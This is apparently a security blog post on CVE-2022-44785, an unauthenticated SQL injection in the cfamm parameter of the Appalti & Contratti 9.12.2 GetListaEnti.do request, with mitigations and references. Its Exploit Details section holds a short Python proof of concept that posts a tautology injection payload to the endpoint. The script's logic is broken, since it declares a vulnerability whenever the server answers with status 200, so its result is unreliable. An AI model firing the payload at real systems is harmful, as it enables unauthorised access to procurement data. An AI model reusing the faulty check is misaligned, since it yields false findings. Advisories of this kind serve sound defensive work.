Security researchers recently discovered an issue in the Appalti & Contratti 9.12.2 web application suite that enables attackers to exploit multiple SQL Injection vulnerabilities, including some that can be executed by unauthenticated users. The vulnerable parameter identified is the cfamm in the GetListaEnti.do HTTP request.

In this post, we'll discuss the discovery and the implications of these vulnerabilities, provide code snippets and references, and suggest mitigations to help developers and administrators protect their systems from potential attacks.

Background Information

Appalti & Contratti is a widely used web application for managing contracts and procurement in various organizations. It's crucial to ensure that the software is free from security vulnerabilities to maintain the integrity and confidentiality of sensitive data.

Exploit Details

The issue stems from the lack of proper filtering and validation when handling user-supplied input in some HTTP requests, leading to SQL Injection vulnerabilities. The affected parameter cfamm, found in the GetListaEnti.do HTTP request, is especially concerning as it can be exploited by unauthenticated users.

Below is a code snippet demonstrating how an attacker could exploit CVE-2022-44785

import requests

url = "http://target/GetListaEnti.do";
data = {
    "cfamm": "1' or '1'='1",  # Injection payload that evaluates to 'true'.
    "maxResults": 25,
}

response = requests.post(url, data=data)
if response.status_code == 200:
    print("SQL Injection vulnerability detected!")
else:
    print("The target seems secure.")

In this example, the malicious payload (1' or '1'='1) is designed to manipulate the SQL query to always evaluate to 'true,' allowing unauthorized access to sensitive data. To learn more about SQL Injection attacks, check out this OWASP guide.

Mitigations

To address these vulnerabilities, developers and administrators should apply the following mitigations:

1. Update the Appalti & Contratti software to the latest version, which contains patches for most known vulnerabilities.
2. Employ proper input filtering and validation techniques to ensure user-supplied data's correct format, reducing the chances of malicious code injection. For guidance, refer to the OWASP Input Validation Cheat Sheet.

For further information about CVE-2022-44785, consult the following resources

1. CVE-2022-44785 official entry in the National Vulnerability Database (NVD).
2. Appalti & Contratti official website detailing the product's features and latest updates.

Conclusion

The discovery of the SQL Injection vulnerabilities in Appalti & Contratti 9.12.2, especially one that can be exploited by unauthenticated users, highlights the importance of keeping web applications up to date and employing secure coding practices. By being proactive and implementing the recommended mitigations, developers and administrators can significantly reduce the risk associated with these vulnerabilities.

Stay informed about the latest security vulnerabilities and best practices to ensure the safety of your web applications, and be sure to share this information with your peers to maintain a strong security posture.

Timeline

Published on: 11/21/2022 23:15:00 UTC
Last modified on: 11/23/2022 16:01:00 UTC